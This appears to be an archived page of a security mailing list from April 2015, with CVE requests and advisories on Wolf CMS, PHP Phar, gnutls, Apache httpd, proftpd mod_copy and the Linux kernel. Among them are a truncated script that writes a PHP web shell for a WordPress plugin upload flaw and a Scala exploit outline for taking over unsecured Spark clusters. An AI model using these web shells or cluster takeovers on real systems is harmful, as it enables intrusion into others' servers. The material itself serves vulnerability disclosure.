Henri Salo | 19 Apr 08:45 2015

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability


Vendor response:

This, I believe, works as designed. There is currently no limit on what a
user can upload.

As this is only possible for authenticated users, we are currently not
considering this a security issue.

If you feel differently, please elaborate why you consider this a security
issue. I guess we could add a strict upload mode.

Cheers, Martijn

Prathan Phongthiproek has requested CVE identifier for this issue.

Comments? Opinions?


Henri Salo

Larry W. Cashdollar | 18 Apr 15:06 2015

Exploit for VideoWhisper WP plugins file upload incomplete fix.

#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }

NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "				VideoWhisper Remote File Upload PoC Redux $NC";
echo "						4/14/2015";
echo "					   Larry W. Cashdollar,  <at> _larry0";
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "		     - Advisories -";
(Continue reading)

Eric Windisch | 17 Apr 17:44 2015

USERNS allows circumventing MNT_LOCKED

In October 2014, Andrey Vagin reported[1] to the Linux Containers list that
it would be possible to use user namespaces to circumvent MNT_LOCKED and
allow unprivileged users to access the directory structure underneath of
mounts. A PoC was also produced and is public.

Patches are now available and proposed to Linus[2].

This may not simply be information disclosure, but containerized
environments may through chroot and mount namespaces mask directory
structures as read-only or inaccessible via the use of bind-mounts. Such
read-only masking may be circumvented by this vulnerability on systems
where these directories are not otherwise protected by MAC (i.e. SELinux or

Eric Windisch

[1] https://groups.google.com/forum/#!topic/linux.kernel/HnegnbXk0Vs
[2] http://www.spinics.net/lists/linux-containers/msg30786.html

Marc Deslauriers | 17 Apr 11:06 2015

CVE Request: PHP potential remote code execution with apache 2.4 apache2handler


PHP 5.4.40, 5.5.24 and 5.6.8 fixed a potential remote code execution
vulnerability when used with the Apache 2.4 apache2handler.

https://bugs.php.net/bug.php?id=68486 (still private)

Fixed by:


Could a CVE please be assigned to this issue?



Emmanuel Law | 16 Apr 21:11 2015

[CVE Request] Multiple vulnerabilities in PHP's Phar handling

This serves as a cve request + advisory.

PHP has the built-in Phar & PharData functionality since 5.3.0. It allows
developers to use them to manipulate the following archive types: tar, zip,
phar. Several vulnerabilities were found in the Phar extension.

[1: CVE Request]
There is a stack-based buffer overflow when opening tar, zip or phar
archives through the Phar extension. An attacker can exploit this to run
arbitrary code.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69441

Please assign a CVE for this.

[2: Advisory for CVE-2015-2783]
When processing a specially crafted phar file, it is possible to trigger a
buffer over-read in PHP's unserialize function. An attacker can exploit
this to dump memory info leak on the system.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69324

(Continue reading)

Akhil Das | 16 Apr 20:19 2015

CVE Request: Arbitrary Code Execution in Apache Spark Cluster

# *Vendor Homepage*: https://spark.apache.org/
# *Software Link*: https://spark.apache.org/downloads.html
# *Version*: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# *Tested on*: 1.2.1

# Reference(s) :
# Exploit URL  : https://github.com/akhld/spark-exploit/

# Spark clusters which are not secured with a proper firewall can be taken
# over easily (since there is no authentication mechanism); this exploit
# simply runs arbitrary code over the cluster.
# All you have to do is find a vulnerable Spark cluster (usually runs on
# port 7077), add that host to your hosts list so that your system will
# recognize it (here it's spark-b-akhil-master pointing to in my /etc/hosts)
# and submit your Spark Job with the arbitrary code that you want to execute.

# Language: Scala

import org.apache.spark.{SparkContext, SparkConf}

 * Created by akhld on 23/3/15.

object Exploit {
  def main(arg: Array[String]) {
(Continue reading)

Florian Weimer | 16 Apr 14:42 2015

kernel: fs.suid_dumpable=2 privilege escalation

Should this be treated as a security vulnerability?

“fs: make dumpable=2 require fully qualified path”

Some widely-used cronie versions still do not have hardening and parse
commands in core dumps.


Florian Weimer / Red Hat Product Security

Martin Prpic | 16 Apr 10:08 2015

Potential CVE request: flaw in comment handling

Hi, we were notified of a flaw in the way Apache's mod_access_compat and
mod_authz_host handled comments in configuration files. When a comment
was defined on the same line that contained an "Allow" directive,
any potential IP ranges in that comment were also allowed to access
a resource.

This flaw was fixed in:


The docs do specify that comments are not allowed on the same line:

"There must be no other characters or white space between the backslash and the end of the line."

MITRE, does this qualify for a CVE?


$ sudo yum -y install httpd

$ echo hest123 | sudo tee /var/www/html/secret.txt

$ echo '<Location "/secret.txt">
> Order allow,deny
> Allow from # not 10
> </Location>' | sudo tee -a /etc/httpd/conf/httpd.conf
$ sudo service httpd restart

client on 10.x.x.x:
(Continue reading)

Jakub Filak | 15 Apr 11:45 2015

Re: Problems in automatic crash analysis frameworks


I have a question regarding the ABRT vulnerabilities. I don't particularly understand how an attacker can
use the /proc/pid/exe symlink to force ABRT to read an arbitrary file if the symlink cannot be changed and
the kernel refuses to create the process if the symlink's target is not executable.

> This code trusts the /proc/pid/exe symlink, even though it is possible
> to link it anywhere you want.
> https://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L368
>        sprintf(buf, "/proc/%lu/exe", (long)pid);
>        int src_fd_binary = open(buf, O_RDONLY); /* might fail and
>                                                    return -1, it's ok */

Thank you for clarifying this for me.

Kind regards,

Robert Święcki | 15 Apr 15:47 2015

double-free in gnutls (CRL distribution points parsing)

gnutls 3.3.14 fixes a double-free in parsing CRL distribution points.

It will affect applications which parse CRL distribution points or
print contents of certificates with gnutls-provided functions (e.g.

Usually a DoS under modern memory allocators, but creating something more
interesting using double-free exploitation techniques is not out of
the question.



Robert Święcki

Hanno Böck | 15 Apr 02:39 2015

proftpd: Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

This sounds serious:

When the module mod_copy is enabled one can copy around files on the
server without any authentication.

(Not sure how widespread the use of this module is.)

There is no upstream release with a fix yet.


Hanno Böck

mail/jabber: hanno@...